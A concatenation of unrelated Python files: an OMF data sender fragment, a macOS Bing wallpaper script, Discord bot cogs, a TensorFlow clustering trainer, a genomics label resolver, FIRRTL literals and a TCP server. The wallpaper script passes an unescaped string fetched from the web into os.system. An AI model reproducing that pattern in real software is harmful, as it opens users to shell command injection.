"type": "number"
},
"Y Acceleration": {
"type": "number"
},
"Z Acceleration": {
"type": "number"
}
# For example, to allow you to send a string-type live data value,
# such as "Status", you would add
#"Status": {
# "type": "string"
#}
}
}
]
# ************************************************************************
# Send the DYNAMIC types message, so that these types can be referenced in all later messages
# ************************************************************************
send_omf_message_to_endpoint("create", "Type", DYNAMIC_TYPES_MESSAGE_JSON)
# !!! Note: if sending data to OCS, static types are not included!
if not SEND_DATA_TO_OSISOFT_CLOUD_SERVICES:
STATIC_TYPES_MESSAGE_JSON = [
# This asset type is used to define a PI AF Element that will be created;
# this type also defines two static string attributes that will be created
# as well; feel free to rename these or add additional
# static attributes for each Element (PI Point attributes will be added later)
# The name of this type will also end up being part of the name of the PI AF Element template
# that is automatically created
{
"id": ASSETS_MESSAGE_TYPE_NAME,
"type": "object",
"classification": "static",
"properties": {
"Name": {
"type": "string",
"isindex": True
},
"Device Type": {
"type": "string"
},
"Location": {
"type": "string"
},
"Data Ingress Method": {
"type": "string"
}
# For example, to add a number-type static
# attribute for the device model, you would add
# "Model": {
# "type": "number"
#}
}
}
]
# ************************************************************************
# Send the STATIC types message, so that these types can be referenced in all later messages
# ************************************************************************
send_omf_message_to_endpoint("create", "Type", STATIC_TYPES_MESSAGE_JSON)
# ************************************************************************
# Create a JSON packet to define containerids and the type
# (using the types listed above) for each new data events container
# ************************************************************************
# The device name that you specified earlier will be used as the AF Element name!
NEW_AF_ELEMENT_NAME = DEVICE_NAME
CONTAINERS_MESSAGE_JSON = [
{
"id": DATA_VALUES_CONTAINER_ID,
"typeid": DATA_VALUES_MESSAGE_TYPE_NAME
}
]
# ************************************************************************
# Send the container message, to instantiate this particular container;
# we can now directly start sending data to it using its Id
# ************************************************************************
send_omf_message_to_endpoint("create", "Container", CONTAINERS_MESSAGE_JSON)
# !!! Note: if sending data to OCS, static types are not included!
if not SEND_DATA_TO_OSISOFT_CLOUD_SERVICES:
# ************************************************************************
# Create a JSON packet to containing the asset and
# linking data for the PI AF asset that will be made
# ************************************************************************
# Here is where you can specify values for the static PI AF attributes;
# in this case, we're auto-populating the Device Type,
# but you can manually hard-code in values if you wish
# we also add the LINKS to be made, which will both position the new PI AF
# Element, so it will show up in AF, and will associate the PI Points
# that will be created with that Element
ASSETS_AND_LINKS_MESSAGE_JSON = [
{
# This will end up creating a new PI AF Element with
# this specific name and static attribute values
"typeid": ASSETS_MESSAGE_TYPE_NAME,
"values": [
{
"Name": NEW_AF_ELEMENT_NAME,
"Device Type": (
platform.machine() + " - " + platform.platform() + " - " + platform.processor()
),
"Location": DEVICE_LOCATION,
"Data Ingress Method": "OMF"
}
]
},
{
"typeid": "__Link",
"values": [
# This first link will locate such a newly created AF Element under
# the root PI element targeted by the PI Connector in your target AF database
# This was specfied in the Connector Relay Admin page; note that a new
# parent element, with the same name as the PRODUCER_TOKEN, will also be made
{
"Source": {
"typeid": ASSETS_MESSAGE_TYPE_NAME,
"index": "_ROOT"
},
"Target": {
"typeid": ASSETS_MESSAGE_TYPE_NAME,
"index": NEW_AF_ELEMENT_NAME
}
},
# This second link will map new PI Points (created by messages
# sent to the data values container) to a newly create element
{
"Source": {
"typeid": ASSETS_MESSAGE_TYPE_NAME,
"index": NEW_AF_ELEMENT_NAME
},
"Target": {
"containerid": DATA_VALUES_CONTAINER_ID
}
}
]
}
]
# ************************************************************************
# Send the message to create the PI AF asset; it won't appear in PI AF,
# though, because it hasn't yet been positioned...
# ************************************************************************
send_omf_message_to_endpoint("create", "Data", ASSETS_AND_LINKS_MESSAGE_JSON)
# ************************************************************************
# Initialize sensors prior to sending data (if needed), using the function defined earlier
# ************************************************************************
initialize_sensors()
# ************************************************************************
# Finally, loop indefinitely, sending random events
# conforming to the value type that we defined earlier
# ************************************************************************
print(
'\n--- Now sending live data every ' + str(NUMBER_OF_SECONDS_BETWEEN_VALUE_MESSAGES) +
' second(s) for device "' + NEW_AF_ELEMENT_NAME + '"... (press CTRL+C to quit at any time)\n'
)
if not SEND_DATA_TO_OSISOFT_CLOUD_SERVICES:
print(
'--- (Look for a new AF Element named "' + NEW_AF_ELEMENT_NAME + '".)\n'
)
while True:
# Call the custom function that builds a JSON object that
# contains new data values; see the beginning of this script
VALUES_MESSAGE_JSON = create_data_values_message()
# Send the JSON message to the target URL
send_omf_message_to_endpoint("create", "Data", VALUES_MESSAGE_JSON)
# Send the next message after the required interval
time.sleep(NUMBER_OF_SECONDS_BETWEEN_VALUE_MESSAGES)
|
# -*- coding: utf-8 -*-
import os
import urllib
import requests
import Foundation
from appscript import app, mactypes
import subprocess
class BingImageInfo:
def __init__(self):
self.jsonUrl = "http://www.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1&mkt=en-US"
self.response = requests.get(self.jsonUrl).json()
def get_image_url(self):
image_url = self.response['images'][0]['url']
# When using vpn, the server address of bing image may be different between countries.
if image_url.startswith("http://s.cn.bing.net"):
return image_url
elif not image_url.startswith("https://www.bing.com") and not image_url.startswith("http://www.bing.com"):
image_url = "https://www.bing.com" + image_url
return image_url
def get_story(self):
return self.response['images'][0]['copyright']
class EnjoyBing:
def __init__(self, image_location_prefix):
self.bing_image_info = BingImageInfo()
image_url = self.bing_image_info.get_image_url()
image_path = image_location_prefix + image_url.rsplit('/', 1)[-1]
urllib.urlretrieve(image_url, image_path)
self.image_path = image_path
def set_wallpaper(self):
set_wallpaper_script = """tell application "Finder"
set desktop picture to POSIX file "%s"
end tell"""
s = Foundation.NSAppleScript.alloc().initWithSource_(set_wallpaper_script % self.image_path)
s.executeAndReturnError_(None)
def pop_up_story_window(self):
bing_image_story = self.bing_image_info.get_story()
command_show_story_info = "osascript -e \'tell app \"System Events\" to display notification \"" + bing_image_story.encode('utf-8') + "\" with title \"Bing Image Story\"\'"
os.system(command_show_story_info)
|
#!/usr/bin/env python3
# Copyright 2017 University of Maryland.
#
# This file is part of Sesame. It is subject to the license terms in the file
# LICENSE.rst found in the top-level directory of this distribution.
from sesame.ui import mainwindow
from PyQt5.QtWidgets import QApplication
from PyQt5 import QtGui
import sys
import ctypes
if sys.platform == 'win32':
appID = 'sesameGUI'
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(appID)
app = QApplication(sys.argv)
stylesheet = """
QGroupBox {
border: 1px solid gray;
border-radius: 9px;
margin-top: 0.5em;
font-weight: bold;
}
QGroupBox::title {
subcontrol-origin: margin;
left: 10px;
padding: 0 3px 0 3px;
}
"""
app.setStyleSheet(stylesheet)
window = mainwindow.Window()
sys.exit(app.exec_())
|
#!/usr/bin/env python
from bourbaki.application.cli import CommandLineInterface, ArgSource
from typing import *
cli = CommandLineInterface(
prog="foo.py", arg_lookup_order=(ArgSource.CLI, ArgSource.DEFAULTS)
)
@cli.definition
class Foo:
"""command line interface called foo"""
def __init__(self, x: int = 42, y: Optional[List[bool]] = None):
"""
set it up
:param x: an int
:param y: a list of bools
"""
self.x = x
self.y = y
def wut(
self,
tup: Tuple[Tuple[int, int], str, Tuple[complex, ...]],
opt: Optional[List[Set[int]]] = None,
):
"""
wut to the wut
:param tup: crazy nested tuple
:param opt: nested lists
:return:
"""
print(tup)
print(opt)
if __name__ == "__main__":
cli.run()
|
import discord
from discord.ext import commands
from random import shuffle, randint
from asyncio import sleep
from utils.generalFuncs import return_weather, NewsFromBBC, indianNews
class generalCog(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.subChannel = []
@commands.command(name = 'start')
async def ping(self, ctx):
await ctx.channel.send("Hey {} . I'm still awake btw....".format(ctx.message.author.mention))
@commands.command(name = 'help')
async def helpHim(self, ctx):
async with ctx.channel.typing():
fileManager = open('res/bot_intro.txt', 'r')
bot_intro = fileManager.read()
bot_intro = bot_intro.replace('Srikar', self.bot.appInfo.owner.mention)
fileManager.close()
await ctx.channel.send(bot_intro)
@commands.command(name = 'weatherUpdate')
async def send_weather(self, ctx):
city = ctx.message.content[15:]
await ctx.channel.send(return_weather(city))
@commands.command(name = 'intNews')
async def send_int_news(self, ctx):
async with ctx.channel.typing():
await ctx.channel.send(NewsFromBBC())
@commands.command(name = 'indNews')
async def send_ind_news(self, ctx):
async with ctx.channel.typing():
await ctx.channel.send(indianNews())
@commands.command(name = 'xkcd') # Thanks Raghav. Asyncio is the best indeed. So is XKCD
async def startXKCD(self, ctx):
if([ctx.guild, ctx.channel] in self.subChannel):
await ctx.channel.send("Already subscribed, wait for the next meme ;)")
else:
self.subChannel.append([ctx.guild, ctx.channel])
await ctx.channel.send("XKCD service coming up")
l = [i for i in range(1, 2300, 1)]
shuffle(l)
while(len(l) > 0):
index = randint(0, len(l))
number = l[index]
l.pop(index)
url = "https://xkcd.com/" + str(number)
await ctx.channel.send("@everyone here's your xkcd : " + url)
await sleep(60 * 60 * 4)
@commands.command(name = 'owner')
async def send_owner(self, ctx):
await ctx.channel.send('{} owns me. Literally!'.format(self.bot.appInfo.owner.mention))
@commands.command()
async def send_message(self, ctx, *, message : str):
await ctx.channel.send(message)
def setup(bot):
bot.add_cog(generalCog(bot))
|
import argparse
import math
import subprocess
from datetime import datetime
import numpy as np
import tensorflow as tf
import socket
import importlib
import os,ast
import sys
from sklearn.cluster import KMeans
import h5py
np.set_printoptions(edgeitems=1000)
from scipy.optimize import linear_sum_assignment
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
sys.path.append(os.path.join(BASE_DIR,'..', 'models'))
sys.path.append(os.path.join(BASE_DIR,'..' ,'utils'))
import provider
import gapnet_classify as MODEL
parser = argparse.ArgumentParser()
parser.add_argument('--max_dim', type=int, default=3, help='Dimension of the encoding layer [Default: 3]')
parser.add_argument('--n_clusters', type=int, default=3, help='Number of clusters [Default: 3]')
parser.add_argument('--gpu', type=int, default=0, help='GPU to use [default: GPU 0]')
parser.add_argument('--model', default='gapnet_clasify', help='Model name [default: gapnet_classify]')
parser.add_argument('--log_dir', default='log', help='Log dir [default: log]')
parser.add_argument('--num_point', type=int, default=100, help='Point Number [default: 100]')
parser.add_argument('--max_epoch', type=int, default=200, help='Epoch to run [default: 200]')
parser.add_argument('--batch_size', type=int, default=512, help='Batch Size during training [default: 512]')
parser.add_argument('--learning_rate', type=float, default=0.001, help='Initial learning rate [default: 0.01]')
parser.add_argument('--momentum', type=float, default=0.9, help='Initial momentum [default: 0.9]')
parser.add_argument('--optimizer', default='adam', help='adam or momentum [default: adam]')
parser.add_argument('--decay_step', type=int, default=500000, help='Decay step for lr decay [default: 500000]')
parser.add_argument('--wd', type=float, default=0.0, help='Weight Decay [Default: 0.0]')
parser.add_argument('--decay_rate', type=float, default=0.5, help='Decay rate for lr decay [default: 0.5]')
parser.add_argument('--output_dir', type=str, default='train_results', help='Directory that stores all training logs and trained models')
parser.add_argument('--data_dir', default='../h5', help='directory with data [default: hdf5_data]')
parser.add_argument('--nfeat', type=int, default=8, help='Number of features [default: 8]')
parser.add_argument('--ncat', type=int, default=20, help='Number of categories [default: 20]')
parser.add_argument('--test', action='store_true', default=False,help='Test training')
FLAGS = parser.parse_args()
H5_DIR = FLAGS.data_dir
EPOCH_CNT = 0
MAX_PRETRAIN = 20
BATCH_SIZE = FLAGS.batch_size
NUM_POINT = FLAGS.num_point
NUM_FEAT = FLAGS.nfeat
NUM_CLASSES = FLAGS.ncat
MAX_EPOCH = FLAGS.max_epoch
BASE_LEARNING_RATE = FLAGS.learning_rate
GPU_INDEX = FLAGS.gpu
MOMENTUM = FLAGS.momentum
OPTIMIZER = FLAGS.optimizer
DECAY_STEP = FLAGS.decay_step
DECAY_RATE = FLAGS.decay_rate
#MODEL = importlib.import_module(FLAGS.model) # import network module
MODEL_FILE = os.path.join(BASE_DIR, 'models', FLAGS.model+'.py')
LOG_DIR = os.path.join('..','logs',FLAGS.log_dir)
if not os.path.exists(LOG_DIR): os.makedirs(LOG_DIR)
os.system('cp %s.py %s' % (MODEL_FILE, LOG_DIR)) # bkp of model def
os.system('cp train_kmeans.py %s' % (LOG_DIR)) # bkp of train procedure
LOG_FOUT = open(os.path.join(LOG_DIR, 'log_dkm.txt'), 'w')
LOG_FOUT.write(str(FLAGS)+'\n')
BN_INIT_DECAY = 0.5
BN_DECAY_DECAY_RATE = 0.5
BN_DECAY_DECAY_STEP = float(DECAY_STEP)
BN_DECAY_CLIP = 0.99
LEARNING_RATE_CLIP = 1e-5
HOSTNAME = socket.gethostname()
TRAIN_FILES = provider.getDataFiles(os.path.join(H5_DIR, 'train_files_wztop.txt'))
TEST_FILES = provider.getDataFiles(os.path.join(H5_DIR, 'test_files_wztop.txt'))
def log_string(out_str):
LOG_FOUT.write(out_str+'\n')
LOG_FOUT.flush()
print(out_str)
def get_learning_rate(batch):
learning_rate = tf.train.exponential_decay(
BASE_LEARNING_RATE, # Base learning rate.
batch * BATCH_SIZE, # Current index into the dataset.
DECAY_STEP, # Decay step.
DECAY_RATE, # Decay rate.
staircase=True)
learning_rate = tf.maximum(learning_rate, LEARNING_RATE_CLIP) # CLIP THE LEARNING RATE!
return learning_rate
def get_bn_decay(batch):
bn_momentum = tf.train.exponential_decay(
BN_INIT_DECAY,
batch*BATCH_SIZE,
BN_DECAY_DECAY_STEP,
BN_DECAY_DECAY_RATE,
staircase=True)
bn_decay = tf.minimum(BN_DECAY_CLIP, 1 - bn_momentum)
return bn_decay
def train():
with tf.Graph().as_default():
with tf.device('/gpu:'+str(GPU_INDEX)):
pointclouds_pl, labels_pl = MODEL.placeholder_inputs(BATCH_SIZE, NUM_POINT,NUM_FEAT)
is_training_pl = tf.placeholder(tf.bool, shape=())
# Note the global_step=batch parameter to minimize.
# That tells the optimizer to helpfully increment the 'batch' parameter for you every time it trains.
batch = tf.Variable(0)
alpha = tf.placeholder(dtype=tf.float32, shape=())
bn_decay = get_bn_decay(batch)
tf.summary.scalar('bn_decay', bn_decay)
print("--- Get model and loss")
pred , max_pool = MODEL.get_model(pointclouds_pl, is_training=is_training_pl,
bn_decay=bn_decay,
num_class=NUM_CLASSES, weight_decay=FLAGS.wd,
)
class_loss = MODEL.get_focal_loss(pred, labels_pl,NUM_CLASSES)
mu = tf.Variable(tf.zeros(shape=(FLAGS.n_clusters,FLAGS.max_dim)),name="mu",trainable=True) #k centroids
kmeans_loss, stack_dist= MODEL.get_loss_kmeans(max_pool,mu, FLAGS.max_dim,
FLAGS.n_clusters,alpha)
full_loss = 10*kmeans_loss + class_loss
print("--- Get training operator")
# Get training operator
learning_rate = get_learning_rate(batch)
tf.summary.scalar('learning_rate', learning_rate)
if OPTIMIZER == 'momentum':
optimizer = tf.train.MomentumOptimizer(learning_rate, momentum=MOMENTUM)
elif OPTIMIZER == 'adam':
optimizer = tf.train.AdamOptimizer(learning_rate)
train_op_full = optimizer.minimize(full_loss, global_step=batch)
train_op = optimizer.minimize(class_loss, global_step=batch)
# Add ops to save and restore all the variables.
saver = tf.train.Saver()
# Create a session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.allow_soft_placement = True
config.log_device_placement = False
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
# Add summary writers
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(os.path.join(LOG_DIR, 'train'), sess.graph)
test_writer = tf.summary.FileWriter(os.path.join(LOG_DIR, 'test'), sess.graph)
# Init variables
print("Total number of weights for the model: ",np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()]))
ops = {'pointclouds_pl': pointclouds_pl,
'labels_pl':labels_pl,
'is_training_pl': is_training_pl,
'max_pool':max_pool,
'pred': pred,
'alpha': alpha,
'mu': mu,
'stack_dist':stack_dist,
'class_loss': class_loss,
'kmeans_loss': kmeans_loss,
'train_op': train_op,
'train_op_full': train_op_full,
'merged': merged,
'step': batch,
'learning_rate':learning_rate
}
for epoch in range(MAX_EPOCH):
log_string('**** EPOCH %03d ****' % (epoch))
sys.stdout.flush()
is_full_training = epoch > MAX_PRETRAIN
max_pool = train_one_epoch(sess, ops, train_writer,is_full_training)
if epoch == MAX_PRETRAIN:
centers = KMeans(n_clusters=FLAGS.n_clusters).fit(np.squeeze(max_pool))
centers = centers.cluster_centers_
sess.run(tf.assign(mu,centers))
eval_one_epoch(sess, ops, test_writer,is_full_training)
if is_full_training:
save_path = saver.save(sess, os.path.join(LOG_DIR, 'cluster.ckpt'))
else:
save_path = saver.save(sess, os.path.join(LOG_DIR, 'model.ckpt'))
log_string("Model saved in file: %s" % save_path)
def get_batch(data,label, start_idx, end_idx):
batch_label = label[start_idx:end_idx]
batch_data = data[start_idx:end_idx,:,:]
return batch_data, batch_label
def cluster_acc(y_true, y_pred):
"""
Calculate clustering accuracy. Require scikit-learn installed
"""
y_true = y_true.astype(np.int64)
D = max(y_pred.max(), y_true.max()) + 1
w = np.zeros((D, D), dtype=np.int64)
for i in range(y_pred.size):
w[y_pred[i], y_true[i]] += 1
ind = linear_sum_assignment(w.max() - w)
ind = np.asarray(ind)
ind = np.transpose(ind)
return sum([w[i, j] for i, j in ind]) * 1.0 / y_pred.size
def train_one_epoch(sess, ops, train_writer,is_full_training):
""" ops: dict mapping from string to tf ops """
is_training = True
train_idxs = np.arange(0, len(TRAIN_FILES))
acc = loss_sum = 0
y_pool = []
for fn in range(len(TRAIN_FILES)):
#log_string('----' + str(fn) + '-----')
current_file = os.path.join(H5_DIR,TRAIN_FILES[train_idxs[fn]])
current_data, current_label, current_cluster = provider.load_h5_data_label_seg(current_file)
current_label = np.squeeze(current_label)
file_size = current_data.shape[0]
num_batches = file_size // BATCH_SIZE
if FLAGS.test: num_batches = 5
log_string(str(datetime.now()))
for batch_idx in range(num_batches):
start_idx = batch_idx * BATCH_SIZE
end_idx = (batch_idx+1) * BATCH_SIZE
batch_data, batch_label = get_batch(current_data, current_label,start_idx, end_idx)
cur_batch_size = end_idx-start_idx
#print(batch_weight)
feed_dict = {ops['pointclouds_pl']: batch_data,
ops['labels_pl']: batch_label,
ops['is_training_pl']: is_training,
ops['alpha']: 5*(EPOCH_CNT-MAX_PRETRAIN+1),
}
if is_full_training:
summary, step, _, loss_val,dist,lr = sess.run([ops['merged'], ops['step'],
ops['train_op_full'], ops['kmeans_loss'],
ops['stack_dist'],ops['learning_rate']
],
feed_dict=feed_dict)
batch_cluster = np.array([np.where(r==1)[0][0] for r in current_cluster[start_idx:end_idx]])
cluster_assign = np.zeros((cur_batch_size), dtype=int)
for i in range(cur_batch_size):
index_closest_cluster = np.argmin(dist[:, i])
cluster_assign[i] = index_closest_cluster
acc+=cluster_acc(batch_cluster,cluster_assign)
else:
summary, step, _, loss_val,max_pool,lr = sess.run([ops['merged'], ops['step'],
ops['train_op'], ops['class_loss'],
ops['max_pool'],ops['learning_rate']],
feed_dict=feed_dict)
if len(y_pool)==0:
y_pool=np.squeeze(max_pool)
else:
y_pool=np.concatenate((y_pool,np.squeeze(max_pool)),axis=0)
loss_sum += np.mean(loss_val)
train_writer.add_summary(summary, step)
log_string('learning rate: %f' % (lr))
log_string('train mean loss: %f' % (loss_sum / float(num_batches)))
log_string('train clustering accuracy: %f' % (acc/ float(num_batches)))
return y_pool
def eval_one_epoch(sess, ops, test_writer,is_full_training):
""" ops: dict mapping from string to tf ops """
global EPOCH_CNT
is_training = False
test_idxs = np.arange(0, len(TEST_FILES))
# Test on all data: last batch might be smaller than BATCH_SIZE
loss_sum = acc =0
acc_kmeans = 0
for fn in range(len(TEST_FILES)):
#log_string('----' + str(fn) + '-----')
current_file = os.path.join(H5_DIR,TEST_FILES[test_idxs[fn]])
current_data, current_label, current_cluster = provider.load_h5_data_label_seg(current_file)
current_label = np.squeeze(current_label)
file_size = current_data.shape[0]
num_batches = file_size // BATCH_SIZE
if FLAGS.test: num_batches = 5
for batch_idx in range(num_batches):
start_idx = batch_idx * BATCH_SIZE
end_idx = (batch_idx+1) * BATCH_SIZE
batch_data, batch_label = get_batch(current_data, current_label,start_idx, end_idx)
cur_batch_size = end_idx-start_idx
feed_dict = {ops['pointclouds_pl']: batch_data,
ops['is_training_pl']: is_training,
ops['labels_pl']: batch_label,
ops['alpha']: 2*(EPOCH_CNT-MAX_PRETRAIN+1),
}
if is_full_training:
summary, step, loss_val, max_pool,dist,mu= sess.run([ops['merged'], ops['step'],
ops['kmeans_loss'],
ops['max_pool'],ops['stack_dist'],
ops['mu']
],
feed_dict=feed_dict)
if batch_idx==0:
log_string("mu: {}".format(mu))
batch_cluster = np.array([np.where(r==1)[0][0] for r in current_cluster[start_idx:end_idx]])
cluster_assign = np.zeros((cur_batch_size), dtype=int)
for i in range(cur_batch_size):
index_closest_cluster = np.argmin(dist[:, i])
cluster_assign[i] = index_closest_cluster
acc+=cluster_acc(batch_cluster,cluster_assign)
else:
summary, step, loss_val= sess.run([ops['merged'], ops['step'],
ops['class_loss']
],
feed_dict=feed_dict)
test_writer.add_summary(summary, step)
loss_sum += np.mean(loss_val)
total_loss = loss_sum*1.0 / float(num_batches)
log_string('test mean loss: %f' % (total_loss))
log_string('testing clustering accuracy: %f' % (acc / float(num_batches)))
EPOCH_CNT += 1
if __name__ == "__main__":
log_string('pid: %s'%(str(os.getpid())))
train()
LOG_FOUT.close()
|
import sys
def resolve(label):
"""
Given a result from htseq-count, resolve label
"""
if len(label) == 0:
return 'ID'
# one label -> return label
elif '__' not in label:
pieces = label.split(':')
return '{}:{}'.format(pieces[2], pieces[-1][:-1])
# no feature
elif 'no_feature' in label:
return 'no_feature'
# not aligned
elif 'not_aligned' in label:
return 'not_aligned'
# ambiguous mapping
elif 'ambiguous' in label:
if ('exon' in label):
# map to both exons and introns
if ('intron' in label):
ids = label.split('[')[1][:-2].split('+')
gene_ids = list(set([x.split(':')[-1] for x in ids]))
# if it maps to one exon and one intron of the same transcript, call intron/exon junction
if len(ids) == 2:
transcript_ids = [x.split(':')[1] for x in ids]
if (transcript_ids[0] == transcript_ids[1]):
return 'intronexonjunction:{}'.format(gene_ids[0])
# if it maps to exons and introns of different transcripts, same gene, call gene + ambiguous
if len(gene_ids) == 1:
return 'ambiguous:{}'.format(gene_ids[0])
# otherwise, just call ambiguous
return 'ambiguous_intron_exon'
# if it maps to exons of the same gene, call gene, otherwise call ambiguous
ids = label.split('[')[1][:-2].split('+')
ids = list(set([x.split(':')[-1] for x in ids]))
if len(ids) != 1:
return 'ambiguous_mult_genes'
else:
return 'exon:{}'.format(ids[0])
# if it maps to introns of the same gene, call gene, otherwise call ambiguous
elif ('intron' in label):
ids = label.split('[')[1][:-2].split('+')
ids = list(set([x.split(':')[-1] for x in ids]))
if len(ids) != 1:
return 'ambiguous_mult_genes'
else:
return 'intron:{}'.format(ids[0])
else:
return 'other'
if __name__ == '__main__':
INFILE, OUTFILE = sys.argv[1:]
current = ''
count = 'count'
count_dict = {}
i = 0
# read annotations, compile counts and resolve labels
with open(INFILE, 'r') as infile:
for line in infile:
if line != current:
resolved = resolve(current)
if resolved in count_dict:
count_dict[resolved] += count
else:
count_dict[resolved] = count
current = line
count = 1
else:
count += 1
if current in count_dict:
count_dict[current] += count
else:
count_dict[current] = count
# write compiled counts to outfile
with open(OUTFILE, 'w') as outfile:
for key, count in count_dict.items():
outfile.write('{}\t{}\n'.format(key, count))
|
#회원탈퇴
from discord.ext import commands
from discord.ext.commands import Context
from discord.ext.commands.errors import MissingRequiredArgument
from discord_slash import SlashContext, cog_ext
from discord_slash.model import SlashCommandOptionType as OptionType
from discord_slash.utils.manage_commands import create_option
from typing import Union
from define import *
######################################################################################################################################################
@CommandExecutionTime
async def _Withdrawal_code(ctx: Union[Context, SlashContext], string: str):
logger.info(f'[{type(ctx)}] {ctx.author.name}: {ctx.invoked_with} {string}')
if await CheckUser(ctx): return
if string == '탈퇴확인':
with setUserInformation() as data:
del(data.json_data[str(ctx.author.id)])
logger.info('회원탈퇴가 완료되었습니다.')
await ctx.reply('회원탈퇴가 완료되었습니다.')
else:
if isinstance(ctx, Context):
logger.info(f'「.{ctx.invoked_with} 탈퇴확인」을 입력해야 탈퇴할 수 있습니다.')
await ctx.reply(f'「.{ctx.invoked_with} 탈퇴확인」을 입력해야 탈퇴할 수 있습니다.')
else:
logger.info('「탈퇴확인」를 입력해야 탈퇴할 수 있습니다.')
await ctx.reply('「탈퇴확인」를 입력해야 탈퇴할 수 있습니다.')
######################################################################################################################################################
class Withdrawal_SlashContext(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
@cog_ext.cog_slash(
name='회원탈퇴',
description='이 봇에 저장되있는 사용자의 정보를 삭제합니다.',
guild_ids=guilds_id,
options=[
create_option(
name='확인문구',
description='「탈퇴확인」이라고 적어주세요.',
option_type=OptionType.STRING,
required=True
)
],
connector={'확인문구': 'string'}
)
async def _Withdrawal(self, ctx: SlashContext, string: str):
await _Withdrawal_code(ctx, string)
####################################################################################################
class Withdrawal_Context(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
@commands.command(name='회원탈퇴', aliases=['탈퇴'])
async def _Withdrawal(self, ctx: Context, string: str):
await _Withdrawal_code(ctx, string)
@_Withdrawal.error
async def _Withdrawal_error(self, ctx: Context, error):
if isinstance(error, MissingRequiredArgument):
logger.warning(f'「.{ctx.invoked_with} 탈퇴확인」을 입력해야 탈퇴할 수 있습니다.')
await ctx.reply(f'「.{ctx.invoked_with} 탈퇴확인」을 입력해야 탈퇴할 수 있습니다.')
else:
logger.warning(error)
await ctx.send(f"에러가 발생하였습니다.```{error}```")
######################################################################################################################################################
def setup(bot: commands.Bot):
bot.add_cog(Withdrawal_Context(bot))
bot.add_cog(Withdrawal_SlashContext(bot))
|
from ..type import UIntType, SIntType
from . import Expression
from ..utils import serialize_str
class UIntLiteral(Expression):
def __init__(self, value, width):
self.value = value
self.tpe = UIntType(width)
def serialize(self, output):
self.tpe.serialize(output)
output.write(b'("')
output.write(serialize_str("h" + hex(self.value).replace("0x", "")))
output.write(b'")')
class SIntLiteral(Expression):
def __init__(self, value, width):
self.value = value
self.tpe = SIntType(width)
def serialize(self, output):
self.tpe.serialize(output)
output.write(b'("')
output.write(serialize_str("h" + hex(self.value).replace("0x", "")))
output.write(b'")')
|
#!/usr/bin/env python
#
# Cloudlet Infrastructure for Mobile Computing
#
# Author: Zhuo Chen <zhuoc@cs.cmu.edu>
#
# Copyright (C) 2011-2013 Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import multiprocessing
import select
import socket
import SocketServer
import threading
import traceback
import gabriel
LOG = gabriel.logging.getLogger(__name__)
class TCPNetworkError(Exception):
pass
class TCPZeroBytesError(Exception):
pass
class CommonHandler(SocketServer.StreamRequestHandler, object):
'''
A basic handler to be used with TCP server.
A real handler can extend this class by implementing interesting stuff in
_handle_input_data, which is triggered by input transmission, or
_handle_queue_data, which is triggered by putting anything in self.data_queue
'''
def setup(self):
super(CommonHandler, self).setup()
self.stop_queue = multiprocessing.Queue()
def _recv_all(self, recv_size):
'''
Received data till a specified size.
'''
data = ''
while len(data) < recv_size:
tmp_data = self.request.recv(recv_size - len(data))
if tmp_data is None:
raise TCPNetworkError("Cannot recv data at %s" % str(self))
if len(tmp_data) == 0:
raise TCPZeroBytesError("Recv 0 bytes.")
data += tmp_data
return data
def handle(self):
try:
## input list
# 1) react whenever there's input data from client
# 2) (optional) a data queue may trigger some processing
# 3) a stop queue to notify termination
socket_fd = self.request.fileno()
stop_fd = self.stop_queue._reader.fileno()
input_list = [socket_fd, stop_fd]
data_queue_fd = -1
if hasattr(self, 'data_queue'):
data_queue_fd = self.data_queue._reader.fileno()
input_list += [data_queue_fd]
## except list
except_list = [socket_fd, stop_fd]
is_running = True
while is_running:
inputready, outputready, exceptready = select.select(input_list, [], except_list)
for s in inputready:
if s == socket_fd:
self._handle_input_data()
if s == stop_fd:
is_running = False
# For output, check queue first. If we check output socket,
# select may return immediately (in case when nothing is sent out)
if s == data_queue_fd:
self._handle_queue_data()
for e in exceptready:
is_running = False
except TCPZeroBytesError as e:
LOG.info("Connection closed (%s)" % str(self))
except Exception as e:
LOG.warning("connection closed not gracefully (%s): %s\n" % (str(self), str(e)))
LOG.warning(traceback.format_exc())
if self.connection is not None:
self.connection.close()
self.connection = None
LOG.info("[TERMINATE] Finish %s" % str(self))
def _handle_input_data(self):
"""
By default, no input is expected.
But blocked read will return 0 if the other side closes gracefully
"""
data = self.request.recv(1)
if data is None:
raise TCPNetworkError("Cannot recv data at %s" % str(self))
if len(data) == 0:
raise TCPZeroBytesError("Recv 0 bytes.")
else:
LOG.error("unexpected network input in %s" % str(self))
self.terminate()
def _handle_queue_data(self):
pass
def terminate(self):
self.stop_queue.put("terminate\n")
class CommonServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
'''
A basic TCP server.
It handles each TCP connection in the @handler provided to __init__.
'''
is_running = True
def __init__(self, port, handler):
self.server_address = ('0.0.0.0', port)
self.allow_reuse_address = True
self.handler = handler
try:
SocketServer.TCPServer.__init__(self, self.server_address, handler)
except socket.error as e:
LOG.error("socket error: %s" % str(e))
raise TCPNetworkError("Check IP/Port : %s\n" % (str(self.server_address)))
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
def serve_forever(self):
while self.is_running:
self.handle_request()
def handle_error(self, request, client_address):
#SocketServer.TCPServer.handle_error(self, request, client_address)
LOG.warning("Exception raised in handling request!")
def terminate(self):
self.server_close()
self.is_running = False
# close all threads
if self.socket is not None:
self.socket.close()
